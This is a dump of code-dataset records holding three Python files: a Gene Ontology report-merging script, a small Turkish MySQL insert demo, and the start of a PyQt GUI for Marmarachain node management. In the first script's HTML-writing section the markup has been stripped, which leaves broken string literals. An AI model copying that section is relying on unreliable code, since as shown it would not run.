description=__doc__,\n formatter_class=argparse.RawDescriptionHelpFormatter)\n parser.add_argument('-d', '--directory',\n help='The directory to act on')\n parser.add_argument('-v', '--verbose', action='store_true',\n help='More verbose output')\n args = parser.parse_args()\n\n ## Get logger doing something.\n if args.verbose:\n LOGGER.setLevel(logging.INFO)\n LOGGER.info('Verbose: on')\n\n ## Ensure directory.\n if not args.directory:\n die_screaming('need a directory argument')\n LOGGER.info('Will operate in: ' + args.directory)\n\n ids = []\n\n ## Get files out of target directory, searching for the IDs\n ## independent of the metadata.\n src_filenames = glob.glob(args.directory + '/*.report.md')\n LOGGER.info(src_filenames)\n for src_filename in src_filenames:\n ## Chop off all extensions.\n potential_id = src_filename\n ## I don't know what extensions we'll be using in the future,\n ## so just chop everything off.\n while os.path.splitext(potential_id)[1] != '':\n potential_id = os.path.splitext(potential_id)[0]\n ## Trim off the path.\n potential_id = os.path.basename(potential_id)\n ids.append(potential_id)\n\n ## TODO: Check found resources versus metadata.\n LOGGER.info('Found ' + str(len(ids)) + ' resource(s).')\n\n ## Now that we have IDs, start the great concatenation.\n lookup = {}\n for aid in ids:\n\n ###\n ### Read and munge all the files we'll put together.\n ###\n\n LOGGER.info(\"Processing: \" + aid)\n\n ##\n rmd_p = False\n rmd_data = 'No report generated.'\n rmd_fname = args.directory + '/' + aid + '.report.md'\n if os.path.isfile(rmd_fname):\n with open(rmd_fname) as fileh:\n rmd_data = fileh.read()\n rmd_p = True\n\n ##\n # otc_p = False\n # otc_data = 'No report generated.'\n # otc_fname = args.directory + '/' + aid + '-owltools-check.txt'\n # if os.path.isfile(otc_fname):\n # with open(otc_fname) as fileh:\n # otc_data = fileh.read()\n # otc_p = True\n\n ##\n # sum_p = False\n # sum_data = 'No report generated.'\n # sum_fname = args.directory + '/' + aid + '-summary.txt'\n # if os.path.isfile(sum_fname):\n # with open(sum_fname) as fileh:\n # sum_data = fileh.read()\n # sum_p = True\n\n ##\n pre_p = False\n pre_data = 'No report generated.'\n pre_fname = args.directory + '/' + aid + '-prediction-report.txt'\n if os.path.isfile(pre_fname):\n with open(pre_fname) as fileh:\n pre_data = fileh.read()\n pre_p = True\n\n ##\n epr_p = False\n epr_data = 'No report generated.'\n epr_fname = args.directory + '/' + aid + '-prediction-experimental-report.txt'\n if os.path.isfile(epr_fname):\n with open(epr_fname) as fileh:\n epr_data = fileh.read()\n epr_p = True\n\n # ###\n # ### Extract information from actual using grep.\n # ### grep EXIT STATUS\n # ### The following exit values are returned:\n # ### 0 One or more matches were found.\n # ### 1 No matches were found.\n # ### 2 Syntax errors or inaccessible files (even if matches were found).\n # ###\n\n # ## Get source count.\n # foo = subprocess.run(\n # 'zgrep -Ec \"$\" ' + args.directory + '/' + aid + '-src.gaf.gz',\n # shell=True, check=False, stdout=subprocess.PIPE)\n # if type(foo) is not subprocess.CompletedProcess:\n # die_screaming('Shell fail on: ' + str(foo))\n # elif foo.returncode == 2:\n # die_screaming('Bad file on: ' + str(foo))\n # count_gaf_src = int(foo.stdout)\n\n ## Output file.\n with open(args.directory + '/' + aid + '-report.html', 'w') as f:\n f.write('\\n')\n f.write('\\n')\n\n f.write('

    Table of contents

    \\n')\n f.write('
    \\n')\n f.write('

    \\n')\n f.write('

      \\n')\n f.write('
    • \\n')\n f.write(' Report')\n if rmd_p:\n f.write(' (original)\\n')\n else:\n f.write(' \\n')\n f.write('
    • \\n')\n f.write('
    • \\n')\n f.write(' Predictions')\n if pre_p:\n f.write(' (original)\\n')\n else:\n f.write(' \\n')\n f.write('
    • \\n')\n f.write('
    • \\n')\n f.write(' Predictions (experimental)')\n if epr_p:\n f.write(' (original)\\n')\n else:\n f.write(' \\n')\n f.write('
    • \\n')\n f.write('
    \\n')\n f.write('

    \\n')\n f.write('
    \\n')\n\n f.write('

    Report

    \\n')\n f.write('
    \\n')\n f.write(markdown.markdown(rmd_data, extensions=[\"markdown.extensions.headerid\"]))\n #f.write(rmd_data)\n f.write('\\n')\n f.write('
    \\n')\n\n f.write('

    Predictions

    \\n')\n f.write('
    \\n')\n f.write(pre_data.replace(\"\\n\",\"
    \\n\"))\n f.write('\\n')\n f.write('
    \\n')\n\n f.write('

    Predictions (experimental)

    \\n')\n f.write('
    \\n')\n f.write(epr_data.replace(\"\\n\",\"
    \\n\"))\n f.write('\\n')\n f.write('
    \\n')\n\n f.write('\\n')\n f.write('\\n')\n f.closed\n\n ## Close out if everything went okay.\n if DIED_SCREAMING_P:\n LOGGER.info('Errors happened.')\n sys.exit(1)\n else:\n LOGGER.info('All passing.')\n\n\n## You saw it coming...\nif __name__ == '__main__':\n main()\n","repo_name":"geneontology/go-site","sub_path":"scripts/merge-all-reports.py","file_name":"merge-all-reports.py","file_ext":"py","file_size_in_byte":7446,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"35"} +{"seq_id":"24501236305","text":"import mysql.connector\n\nveritab = mysql.connector.connect(\n host = \"localhost\",\n user =\"root\",\n passwd = \"\",\n database = \"first_demo\"\n)\nsayi= int(input(\" Kaç kayıt eklemek istiyorsun \"))\n\nfor i in range (sayi):\n ad =input(\"isminizi giriniz\")\n yer = input(\"adresinizi giriniz \")\n\n\nmycursor = veritab.cursor()\n\nsorgu = \"INSERT INTO employees_3 (name,address) VALUES (%s,%s)\"\n\ndeger = [\n (\"Ekrem\", \"İstanbul No:15\"),\n (\"Mansur\", \"Ankara No:64\"),\n (\"Ayşe\", \"İzmir No:67\"),\n (\"Deniz\", \"Bodrum No:41\"),\n (\"Melih\", \"Trabzon No:61\"),\n (\"Onur\", \"Hatay No:45\"),\n]\n\nmycursor.executemany(sorgu,deger)\n\nveritab.commit()\n\nprint(mycursor.rowcount, \"Kayıt eklendi.\")\n\n\n","repo_name":"hasan-ylmz/Python-School","sub_path":"python database-sql/çoklu veri_2.py","file_name":"çoklu veri_2.py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"44247412565","text":"import json\nimport os\nimport pathlib\nimport platform\nimport sys\nimport time\nimport webbrowser\nimport logging\nimport qrcode\nfrom datetime import datetime, timedelta\nfrom qr_code_gen import Image\nfrom PyQt5 import QtWidgets, QtCore, QtChart\nfrom PyQt5.QtGui import QIcon, QRegExpValidator, QFont, QPainter, QFontDatabase\nfrom PyQt5.QtChart import QChart, QChartView, QPieSeries\nfrom PyQt5.QtCore import QThread, pyqtSlot, QDateTime, QSize, Qt, QTranslator, QRegExp\nfrom PyQt5.QtWidgets import QMainWindow, QPushButton, QTableWidgetItem, QMessageBox, QDesktopWidget, QHeaderView, \\\n QDialog, QDialogButtonBox, QVBoxLayout, QGridLayout, QToolTip, QHBoxLayout, QFileDialog\nimport configuration\nimport marmarachain_rpc\nimport api_request\nimport remote_connection\nimport chain_args as cp\nimport qtguistyle\nfrom Loading import LoadingScreen\nimport qtawesome as qta\nfrom fbs_runtime.application_context.PyQt5 import ApplicationContext\n\nlogging.getLogger(__name__)\n\n\nclass MarmaraMain(QMainWindow, qtguistyle.GuiStyle):\n\n def __init__(self, parent=None):\n super(MarmaraMain, self).__init__(parent)\n # Default Settings\n self.trans = QTranslator(self)\n self.retranslateUi(self)\n self.default_fontsize = 12\n self.get_default_fontsize()\n self.set_font_size(self.default_fontsize)\n self.main_tab.setCurrentIndex(0)\n self.main_tab.tabBar().setVisible(False)\n self.login_stackedWidget.setCurrentIndex(0)\n self.home_button.setVisible(False)\n self.chain_status = False\n self.chain_synced = False\n self.pubkey_status = False\n self.center_ui()\n self.selected_stylesheet = \"\"\n self.get_initial_style_settings()\n self.read_lang_setting()\n self.set_tooltip_texts()\n self.get_balance_hide()\n # paths settings\n # Menu Actions\n self.actionAbout.triggered.connect(self.show_about)\n self.actionLogout.triggered.connect(self.logout_host)\n self.actionLanguage_Selection.triggered.connect(self.show_languages)\n self.actionConsole.setVisible(False)\n self.actionConsole.triggered.connect(self.open_debug_console)\n self.actionSee_Log_File.triggered.connect(self.open_log_file)\n self.actionSee_chain_Log_File.triggered.connect(self.open_chain_log_file)\n self.actionCheck_for_Update.triggered.connect(self.check_app_version)\n self.actionAppearances.triggered.connect(self.show_style_themes)\n # Login page Host Selection\n self.local_button.clicked.connect(self.local_selection)\n self.remote_button.clicked.connect(self.remote_selection)\n # Login page Server authentication\n self.home_button.clicked.connect(self.host_selection)\n self.serveradd_button.clicked.connect(self.server_add_selected)\n self.connect_button.clicked.connect(self.server_connect)\n self.serverpw_lineEdit.returnPressed.connect(self.server_connect)\n self.serveredit_button.clicked.connect(self.server_edit_selected)\n self.regex = QRegExp(\"[1-90_]{1,5}\")\n self.validator = QRegExpValidator(self.regex)\n self.ssh_port_lineEdit.setValidator(self.validator)\n self.ssh_port_lineEdit.setText('22')\n self.ssh_port_checkBox.clicked.connect(self.enable_ssh_custom_port)\n # install page\n self.start_install_button.clicked.connect(self.start_autoinstall)\n self.sudo_password_lineEdit.returnPressed.connect(self.start_autoinstall)\n ## Add Server Settings page\n self.add_serversave_button.clicked.connect(self.save_server_settings)\n self.servercancel_button.clicked.connect(self.add_cancel_selected)\n ## Edit Server Settings page\n self.edit_serversave_button.clicked.connect(self.edit_server_settings)\n self.serverdelete_button.clicked.connect(self.delete_server_setting)\n # MCL tabwidget\n self.mcl_tab.currentChanged.connect(self.mcl_tab_changed)\n # side panel\n self.copyaddress_button.clicked.connect(self.copyaddress_clipboard)\n self.copypubkey_button.clicked.connect(self.copypubkey_clipboard)\n self.staking_button.setChecked(False)\n self.staking_button.clicked.connect(self.toggle_staking)\n self.mining_button.setChecked(False)\n # self.regex = QRegExp(\"[1-90_]{1,4}\")\n # self.validator = QRegExpValidator(self.regex)\n self.cpu_core_lineEdit.setValidator(self.validator)\n self.cpu_core_selection_off()\n self.cpu_core_set_button.clicked.connect(self.setmining_cpu_core)\n self.mining_button.clicked.connect(self.toggle_mining)\n self.getinfo_refresh_button.clicked.connect(self.refresh_side_panel)\n self.walletsummary_hide_button.clicked.connect(self.toggle_walletsummary)\n self.cup_lineEdit.setValidator(self.validator)\n self.cup_lineEdit.textChanged.connect(self.calculate_amount)\n self.cup_lineEdit.returnPressed.connect(self.send_coins_to_team)\n self.support_pushButton.clicked.connect(self.send_coins_to_team)\n self.fontsize_plus_button.clicked.connect(self.increase_fontsize)\n self.fontsize_minus_button.clicked.connect(self.decrease_fontsize)\n self.discord_button.clicked.connect(self.open_discord)\n self.youtube_button.clicked.connect(self.open_youtube)\n self.website_button.clicked.connect(self.open_website)\n # Chain page\n self.stopchain_button.clicked.connect(self.stop_chain)\n self.addaddress_page_button.clicked.connect(self.get_address_page)\n self.addresses_tableWidget.cellClicked.connect(self.addresstable_itemcontext)\n self.privkey_page_button.clicked.connect(self.see_privkey_page)\n self.hide_address_checkBox.clicked.connect(self.hide_addresses)\n self.download_blocks_button.clicked.connect(self.download_blocks)\n self.refresh_walletaddresses_button.clicked.connect(self.getaddresses)\n self.check_fork_button.clicked.connect(self.check_fork)\n self.check_fork_button.setHidden(True)\n self.update_chain_button.clicked.connect(self.update_chain_latest)\n self.latest_chain_version = None\n self.chain_versiyon_tag = None\n self.update_chain_textBrowser.setVisible(False)\n self.debug_button.clicked.connect(self.toggle_textbrowser)\n self.rescan_checkBox.setVisible(False)\n self.reindex_checkBox.setVisible(False)\n self.startchain_button.setVisible(False)\n self.startchain_button.clicked.connect(self.start_chain_settings)\n # - add address page ----\n self.newaddress_button.clicked.connect(self.get_new_address)\n self.address_seed_button.clicked.connect(self.convertpassphrase)\n self.addresspage_back_button.clicked.connect(self.back_chain_widget_index)\n self.new_address_frame.setEnabled(False)\n self.add_with_seed_radiobutton.clicked.connect(self.change_address_frame_visibility)\n self.add_without_seed_radiobutton.clicked.connect(self.change_address_frame_visibility)\n # - private key page ----\n self.importprivkey_button.clicked.connect(self.importprivkey)\n self.privatekeypage_back_button.clicked.connect(self.back_chain_widget_index)\n # Wallet page\n self.myCCActivatedAddress = None\n self.addressamount_refresh_button.clicked.connect(self.get_address_amounts)\n self.lock_button.clicked.connect(self.marmaralock_amount)\n self.unlock_button.clicked.connect(self.marmaraunlock_amount)\n self.refresh_loopinfo_button.setVisible(False)\n self.refresh_loopinfo_button.clicked.connect(self.get_wallet_loopinfo)\n # Coin send-receive page\n self.contacts_address_comboBox.currentTextChanged.connect(self.get_selected_contact_address)\n self.qrcode_button.clicked.connect(self.create_currentaddress_qrcode)\n self.coinsend_button.clicked.connect(self.sendtoaddress)\n self.transactions_startdate_dateTimeEdit.setMinimumDateTime(QDateTime(datetime.fromtimestamp(1579278200)))\n self.transactions_startdate_dateTimeEdit.setMaximumDateTime(QDateTime.currentDateTime())\n self.transactions_startdate_dateTimeEdit.setDateTime(QDateTime.currentDateTime().addDays(-1))\n self.transactions_endtdate_dateTimeEdit.setMinimumDateTime(QDateTime(datetime.fromtimestamp(1579278200)))\n self.transactions_endtdate_dateTimeEdit.setDateTime(QDateTime.currentDateTime())\n self.transaction_search_button.clicked.connect(self.getaddresstxids)\n self.transactions_tableWidget.cellClicked.connect(self.transaction_itemcontext)\n # Credit Loops page-----------------\n self.creditloop_tabWidget.currentChanged.connect(self.credit_tab_changed)\n # ---- Received Loop Requests page ----\n self.looprequest_search_button.clicked.connect(self.search_marmarareceivelist)\n self.request_date_checkBox.clicked.connect(self.set_request_date_state)\n self.request_dateTimeEdit.setDateTime(QDateTime.currentDateTime())\n self.contactpk_otherpk_looprequest_comboBox.currentTextChanged.connect(self.get_selected_contact_pukey)\n # -----Make credit Loop Request\n self.contactpk_makeloop_comboBox.currentTextChanged.connect(self.get_selected_contact_loop_pubkey)\n self.contactpk_transferrequest_comboBox.currentTextChanged.connect(self.get_selected_contact_transfer_pubkey)\n self.make_credit_loop_matures_dateTimeEdit.setMinimumDateTime(QDateTime.currentDateTime())\n self.send_loop_request_button.clicked.connect(self.marmarareceive)\n self.send_transfer_request_button.clicked.connect(self.marmararecieve_transfer)\n self.looprequest_otherpk_radioButton.clicked.connect(self.change_visibilty_looprequestpubkey)\n self.looprequest_currentpk_radioButton.clicked.connect(self.change_visibilty_looprequestpubkey)\n self.change_visibilty_looprequestpubkey()\n # -----Total Credit Loops page -----\n self.activeloops_search_button.clicked.connect(self.search_active_loops)\n self.holderloops_search_button.clicked.connect(self.marmaraholderloops)\n self.activeloops_tableWidget.cellClicked.connect(self.activeloop_itemcontext)\n self.transferableloops_tableWidget.cellClicked.connect(self.transferableloops_itemcontext)\n # ---- Loop Queries page --\n self.lq_pubkey_search_button.clicked.connect(self.search_any_pubkey_loops)\n self.lq_txid_search_button.clicked.connect(self.search_loop_txid)\n\n # Contacts Page\n self.addcontact_button.clicked.connect(self.add_contact)\n self.updatecontact_button.clicked.connect(self.update_contact)\n self.deletecontact_button.clicked.connect(self.delete_contact)\n self.contacts_tableWidget.cellClicked.connect(self.get_contact_info)\n self.clear_contact_button.clicked.connect(self.clear_contacts_line_edit)\n self.contacts_tableWidget.horizontalHeader().sectionClicked.connect(self.clear_contacts_line_edit)\n self.contact_editing_row = \"\"\n # Stats Page\n self.stats_refresh_pushButton.clicked.connect(self.get_marmara_stats)\n self.stats_calculate_pushButton.setEnabled(False)\n self.stats_amount_in_activated_lineEdit.setEnabled(False)\n self.stats_amount_in_loops_lineEdit.setEnabled(False)\n self.stats_calculate_pushButton.clicked.connect(self.calculate_estimated_stake)\n self.earning_stop_dateTimeEdit.setMaximumDateTime(QDateTime.currentDateTime())\n self.earning_stop_dateTimeEdit.setDateTime(QDateTime.currentDateTime())\n self.earning_start_dateTimeEdit.setMaximumDateTime(QDateTime.currentDateTime())\n self.earning_start_dateTimeEdit.setDateTime(QDateTime.currentDateTime().addDays(-1))\n self.earnings_search_button.clicked.connect(self.get_wallet_earnings)\n self.export_earning_table_button.clicked.connect(self.pay_for_export)\n # Market Page\n self.exchange_market_request_button.clicked.connect(self.get_mcl_exchange_market)\n self.mcl_amount_lineEdit.textEdited.connect(self.calculate_usd_price)\n self.usd_amount_lineEdit.textEdited.connect(self.calculate_mcl_price)\n self.mcl_exchange_market_result = None\n self.mcl_exchange_ticker_result = None\n self.market_fiat_comboBox.addItems(['USD', 'TRY', 'BTC', 'EUR', 'RUB'])\n self.market_fiat_comboBox.currentTextChanged.connect(self.market_fiat_changed)\n\n # Thread setup\n self.thread_marmarad_path = QThread()\n self.thread_autoinstall = QThread()\n self.thread_getinfo = QThread()\n self.thread_getchain = QThread()\n self.thread_stopchain = QThread()\n self.thread_getaddresses = QThread()\n self.thread_setpubkey = QThread()\n self.thread_getnewaddress = QThread()\n self.thread_convertpassphrase = QThread()\n self.thread_importprivkey = QThread()\n self.thread_address_privkey = QThread()\n self.thread_seeprivkey = QThread()\n self.thread_marmaralock = QThread()\n self.thread_marmaraunlock = QThread()\n self.thread_sendrawtransaction = QThread()\n self.thread_marmarareceivelist = QThread()\n self.thread_sendtoaddress = QThread()\n self.thread_marmaracreditloop = QThread()\n self.thread_marmarareceive = QThread()\n self.thread_setgenerate = QThread()\n self.thread_sidepanel = QThread()\n self.thread_marmarareceive_transfer = QThread()\n self.thread_marmarainfo = QThread()\n self.thread_getloops = QThread()\n self.thread_marmaraissue = QThread()\n self.thread_marmaratransfer = QThread()\n self.thread_getaddresstxids = QThread()\n self.thread_sendtoteam = QThread()\n self.thread_get_address_amounts = QThread()\n self.thread_extract_bootstrap = QThread()\n self.thread_api_exchange_request = QThread()\n self.thread_api_stats_request = QThread()\n self.thread_marmarholderloop = QThread()\n self.thread_getblock = QThread()\n self.thread_api_chain_update_check = QThread()\n self.thread_chain_update = QThread()\n self.thread_fetch_params = QThread()\n self.thread_earnings = QThread()\n self.thread_api_app_ver = QThread()\n\n # Loading Gif\n # --------------------------------------------------\n self.loading = LoadingScreen()\n # --------------------------------------------------\n # Check for update\n self.check_app_version()\n # ---------------------------------------------------\n\n def set_tooltip_texts(self):\n QToolTip.setFont(QFont('SansSerif', 10))\n self.copyaddress_button.setToolTip(self.tr(\"Copy address\"))\n self.copypubkey_button.setToolTip(self.tr(\"Copy pubkey\"))\n self.support_pushButton.setToolTip(self.tr(\"Gift Marmara Core Team cups of coffee\"))\n self.download_blocks_button.setToolTip(self.tr(\"Download Blocks bootstrap\"))\n self.stats_refresh_pushButton.setToolTip(self.tr(\"can be refreshed once in a minute\"))\n self.exchange_market_request_button.setToolTip(self.tr(\"can be refreshed once in 20 seconds\"))\n self.fontsize_plus_button.setToolTip(self.tr(\"Increase font size\"))\n self.fontsize_minus_button.setToolTip(self.tr(\"Decrease font size\"))\n self.youtube_button.setToolTip('Youtube MARMARA')\n self.discord_button.setToolTip('Discord MARMARA')\n self.website_button.setToolTip(\"marmara.io\")\n self.debug_button.setToolTip('Debug')\n self.export_earning_table_button.setToolTip(self.tr('Export to CSV'))\n self.reindex_checkBox.setToolTip(self.tr('starts from beginning and re-indexes currently '\n 'synced blockchain data'))\n self.rescan_checkBox.setToolTip(self.tr('starts scanning wallet data in blockchain data'))\n self.walletsummary_hide_button.setToolTip(self.tr('Hide'))\n self.connections_warning_label.setToolTip(self.tr('Check your Network Connection'))\n\n def center_ui(self):\n qr = self.frameGeometry()\n top_point = QDesktopWidget().availableGeometry().top()\n center_point = QDesktopWidget().availableGeometry().center().x()\n qr.moveTopLeft(QtCore.QPoint(center_point - (qr.width() / 2), top_point))\n self.move(qr.topLeft())\n\n def get_default_fontsize(self):\n fontsize_conf = configuration.ApplicationConfig().get_value('USER', 'fontsize')\n if fontsize_conf:\n self.default_fontsize = int(fontsize_conf)\n\n def get_balance_hide(self):\n if configuration.ApplicationConfig().get_value('USER', 'balance_hide') == 'True':\n self.toggle_walletsummary()\n\n def get_initial_style_settings(self):\n style_conf = configuration.ApplicationConfig().get_value('USER', 'style')\n if style_conf:\n self.set_stylesheet(style_conf)\n else:\n self.set_icon_color('black')\n\n @pyqtSlot()\n def show_style_themes(self):\n font = QFont()\n font.setPointSize(self.default_fontsize)\n themeDialog = QDialog(self)\n themeDialog.setWindowTitle(self.tr(\"Choose a style\"))\n themeDialog.setFont(font)\n themeDialog.setMinimumSize(255, 100)\n apply_button = QDialogButtonBox(QDialogButtonBox.Apply)\n apply_button.setFont(font)\n self.style_comboBox = QtWidgets.QComboBox()\n self.style_comboBox.setFont(font)\n\n themeDialog.layout = QVBoxLayout()\n themeDialog.layout.addWidget(self.style_comboBox)\n themeDialog.layout.addWidget(apply_button)\n themeDialog.setLayout(themeDialog.layout)\n\n entries = os.listdir(qtguistyle.style_path)\n entries.sort()\n for item in entries:\n self.style_comboBox.addItem(item.strip('.qss'))\n self.style_comboBox.addItem('light')\n apply_button.clicked.connect(self.get_theme_selection)\n apply_button.clicked.connect(themeDialog.close)\n themeDialog.exec_()\n\n @pyqtSlot()\n def get_theme_selection(self):\n data = self.style_comboBox.currentText()\n if data:\n configuration.ApplicationConfig().set_key_value('USER', 'style', data)\n self.set_stylesheet(data)\n\n def set_stylesheet(self, data):\n if data == 'light':\n self.selected_stylesheet = \"\"\n self.set_icon_color('black')\n else:\n self.selected_stylesheet = self.get_style(data + '.qss')\n self.set_icon_color('#eff0f1')\n self.setStyleSheet(self.selected_stylesheet)\n self.set_font_size(self.default_fontsize)\n\n @pyqtSlot()\n def check_app_version(self):\n self.worker_api_app_ver = marmarachain_rpc.ApiWorker()\n self.worker_api_app_ver.moveToThread(self.thread_api_app_ver)\n self.worker_api_app_ver.finished.connect(self.thread_api_app_ver.quit)\n self.thread_api_app_ver.started.connect(self.worker_api_app_ver.app_ver_check)\n self.thread_api_app_ver.start()\n self.worker_api_app_ver.out_list.connect(self.check_app_version_listout)\n self.worker_api_app_ver.out_err.connect(self.check_app_version_errtout)\n\n @pyqtSlot(list)\n def check_app_version_listout(self, out):\n latest_app_tag = out[0]\n latest_app_version = out[1]\n base_version = configuration.version\n if base_version != latest_app_tag:\n QMessageBox.information(self, self.tr('Software Update Available'),\n self.tr('A new update is available.
    Follow the link ')\n + \"\" + self.tr(\"here\") + '')\n else:\n self.bottom_info(self.tr('No Update Available Current App version is ') + base_version)\n\n @pyqtSlot(str)\n def check_app_version_errtout(self, out):\n if out == 'Connection Error':\n self.custom_message(self.tr('Connection Error'), self.tr('Check your internet Connection '), 'information',\n QMessageBox.Information)\n\n def read_lang_setting(self):\n language = configuration.ApplicationConfig().get_value('USER', 'lang')\n if language:\n entries = os.listdir(configuration.configuration_path + '/language')\n for item in entries:\n if item.strip('.qm') == language:\n self.change_lang(language)\n\n @pyqtSlot()\n def show_languages(self):\n font = QFont()\n font.setPointSize(self.default_fontsize)\n languageDialog = QDialog(self)\n languageDialog.setMinimumSize(300, 100)\n languageDialog.setWindowTitle(self.tr(\"Choose a language\"))\n languageDialog.setFont(font)\n apply_button = QDialogButtonBox(QDialogButtonBox.Apply)\n apply_button.setFont(font)\n self.lang_comboBox = QtWidgets.QComboBox()\n self.lang_comboBox.setFont(font)\n\n languageDialog.layout = QVBoxLayout()\n languageDialog.layout.addWidget(self.lang_comboBox)\n languageDialog.layout.addWidget(apply_button)\n languageDialog.setLayout(languageDialog.layout)\n\n entries = os.listdir(configuration.configuration_path + '/language')\n entries.sort()\n\n for item in entries:\n self.lang_comboBox.addItem(item.strip('.qm'))\n self.lang_comboBox.setItemIcon(entries.index(item), QIcon(\n self.icon_path + \"/lang_icons\" + \"/\" + item.strip('.qm') + \".png\"))\n apply_button.clicked.connect(self.get_lang_selection)\n apply_button.clicked.connect(languageDialog.close)\n languageDialog.exec_()\n\n @pyqtSlot()\n def get_lang_selection(self):\n data = self.lang_comboBox.currentText()\n if data:\n self.change_lang(data)\n configuration.ApplicationConfig().set_key_value('USER', 'lang', data)\n else:\n QtWidgets.QApplication.instance().removeTranslator(self.trans)\n\n def change_lang(self, data):\n self.trans.load(configuration.configuration_path + '/language/' + data + '.qm')\n QtWidgets.QApplication.instance().installTranslator(self.trans)\n self.retranslateUi(MarmaraMain)\n\n def show_about(self):\n QMessageBox.about(self,\n self.tr(\"About Marmara Connector\"),\n self.tr(\"This is a software written to carry out Marmarachain node operations \"\n \"on a local or remote machine.\" + \"
    Version info: \") + configuration.version\n )\n\n def custom_message(self, title, content, message_type, icon=None, detailed_text=None):\n \"\"\" custom_message(str, str, str: message_type = {information, question}, icon = {QMessageBox.Question,\n QMessageBox.Information, QMessageBox.Warning, QMessageBox.Critical}, str) \"\"\"\n font = QFont()\n font.setPointSize(self.default_fontsize)\n messagebox = QMessageBox()\n messagebox.setStyleSheet(self.selected_stylesheet)\n messagebox.setWindowTitle(title)\n messagebox.setText(content)\n messagebox.setTextInteractionFlags(QtCore.Qt.TextSelectableByMouse)\n messagebox.setDetailedText(detailed_text)\n messagebox.setFont(font)\n btn_yes = None\n btn_no = None\n btn_ok = None\n\n if message_type == \"information\":\n if icon:\n messagebox.setIcon(icon)\n messagebox.setStandardButtons(QMessageBox.Ok)\n btn_ok = messagebox.button(QMessageBox.Ok)\n btn_ok.setText(self.tr(\"Ok\"))\n btn_ok.setFont(font)\n if message_type == \"question\":\n if icon:\n messagebox.setIcon(icon)\n messagebox.setStandardButtons(QMessageBox.Yes | QMessageBox.No)\n btn_yes = messagebox.button(QMessageBox.Yes)\n btn_yes.setText(self.tr(\"Yes\"))\n btn_yes.setFont(font)\n btn_no = messagebox.button(QMessageBox.No)\n btn_no.setText(self.tr(\"No\"))\n btn_no.setFont(font)\n messagebox.exec_()\n if messagebox.clickedButton() == btn_yes:\n return QMessageBox.Yes\n if messagebox.clickedButton() == btn_no:\n return QMessageBox.No\n if messagebox.clickedButton() == btn_ok:\n return QMessageBox.Ok\n\n def host_selection(self):\n self.main_tab.setCurrentIndex(0)\n self.login_stackedWidget.setCurrentIndex(0)\n self.home_button.setVisible(False)\n self.login_message_label.clear()\n self.chain_status = False\n self.chain_synced = False\n self.host_name_label.clear()\n\n def logout_host(self):\n self.current_pubkey_value.clear()\n self.currentaddress_value.clear()\n self.pubkey_status = False\n self.myCCActivatedAddress = None\n self.addresses_tableWidget.setRowCount(0)\n self.addresses_privkey_tableWidget.setRowCount(0)\n self.transactions_tableWidget.setRowCount(0)\n self.loop_request_tableWidget.setRowCount(0)\n self.transferrequests_tableWidget.setRowCount(0)\n self.activeloops_tableWidget.setRowCount(0)\n self.transferableloops_tableWidget.setRowCount(0)\n self.earning_stats_tableWidget.setRowCount(0)\n self.chain_version_label.clear()\n self.latest_chain_version = None\n self.chain_versiyon_tag = None\n self.clear_amount_values()\n self.host_selection()\n\n def clear_amount_values(self):\n self.normal_amount_value.clear()\n self.activated_amount_value.clear()\n self.wallet_total_normal_value.clear()\n self.wallet_total_activated_value.clear()\n self.totalnormal_value_label.clear()\n self.totalactivated_value_label.clear()\n self.total_issuer_loop_amount_label_value.clear()\n self.activeloops_pending_number_value_label.clear()\n self.closedloops_total_amount_value_label.clear()\n self.closedloops_total_number_value_label.clear()\n self.activeloops_total_amount_value_label.clear()\n self.numberof_total_activeloops_label_value.clear()\n self.my_stats_normal_label_value.clear()\n self.my_stats_activated_label_value.clear()\n self.my_stats_inloops_label_value.clear()\n self.total_transferrable_loop_amount_label_value.clear()\n self.numberof_transferrable_loop_amount_label_value.clear()\n self.holderloops_closed_amount_label_value.clear()\n self.holderloops_closed_number_label_value.clear()\n self.activated_earning_value.clear()\n self.normal_earning_value.clear()\n self.total_earning_value.clear()\n\n def local_selection(self):\n marmarachain_rpc.set_connection_local()\n logging.info('is local connection: ' + str(marmarachain_rpc.is_local))\n self.check_marmara_path()\n self.download_blocks_button.show()\n self.host_name_label.setText(self.tr('LOCAL'))\n\n def remote_selection(self):\n self.login_stackedWidget.setCurrentIndex(1)\n self.get_server_combobox_names()\n self.home_button.setVisible(True)\n marmarachain_rpc.set_connection_remote()\n marmarachain_rpc.set_sshclient(None)\n logging.info('is local connection: ' + str(marmarachain_rpc.is_local))\n self.serverpw_lineEdit.clear()\n self.download_blocks_button.hide()\n if self.server_comboBox.count() != 0:\n self.serveredit_button.setEnabled(True)\n self.connect_button.setEnabled(True)\n else:\n self.connect_button.setEnabled(False)\n self.serveredit_button.setEnabled(False)\n\n @pyqtSlot()\n def server_connect(self):\n server_list = configuration.ServerSettings().read_file()\n selected_server_info = server_list[self.server_comboBox.currentIndex()]\n selected_server_info = selected_server_info.split(\",\")\n if not self.ssh_port_lineEdit.text():\n self.ssh_port_lineEdit.setText('22')\n remote_connection.set_server_connection(ip=selected_server_info[2], username=selected_server_info[1],\n pw=self.serverpw_lineEdit.text(),\n ssh_port=self.ssh_port_lineEdit.text())\n validate = remote_connection.check_server_connection()\n if validate == 'error':\n self.login_page_info(self.tr(\"Authentication or Connection Error\"))\n else:\n self.check_marmara_path()\n marmarachain_rpc.set_sshclient(validate)\n self.host_name_label.setText(self.tr('Remote: ') + self.server_comboBox.currentText())\n\n @pyqtSlot()\n def open_debug_console(self):\n QMessageBox.information(self,\n self.tr(\"Debug Console\"),\n self.tr(\"Under development\"))\n\n @pyqtSlot()\n def open_log_file(self):\n text_path = configuration.log_file_path\n webbrowser.open_new(text_path)\n\n @pyqtSlot()\n def open_chain_log_file(self):\n operating_system = platform.system()\n debug_log_path = ''\n if operating_system == 'Darwin':\n debug_log_path = os.environ['HOME'] + '/Library/Application Support/Komodo/MCL'\n elif operating_system == 'Linux':\n debug_log_path = os.environ['HOME'] + '/.komodo/MCL'\n elif operating_system == 'Win64' or operating_system == 'Windows':\n debug_log_path = '%s/komodo/MCL' % os.environ['APPDATA']\n debug_log_file = str(debug_log_path + '/' + 'debug.log')\n webbrowser.open_new(debug_log_file)\n\n @pyqtSlot(int)\n def mcl_tab_changed(self, index):\n if index == 4:\n self.update_contact_tablewidget()\n if index == 2:\n self.get_contact_names_addresses()\n if index == 3:\n 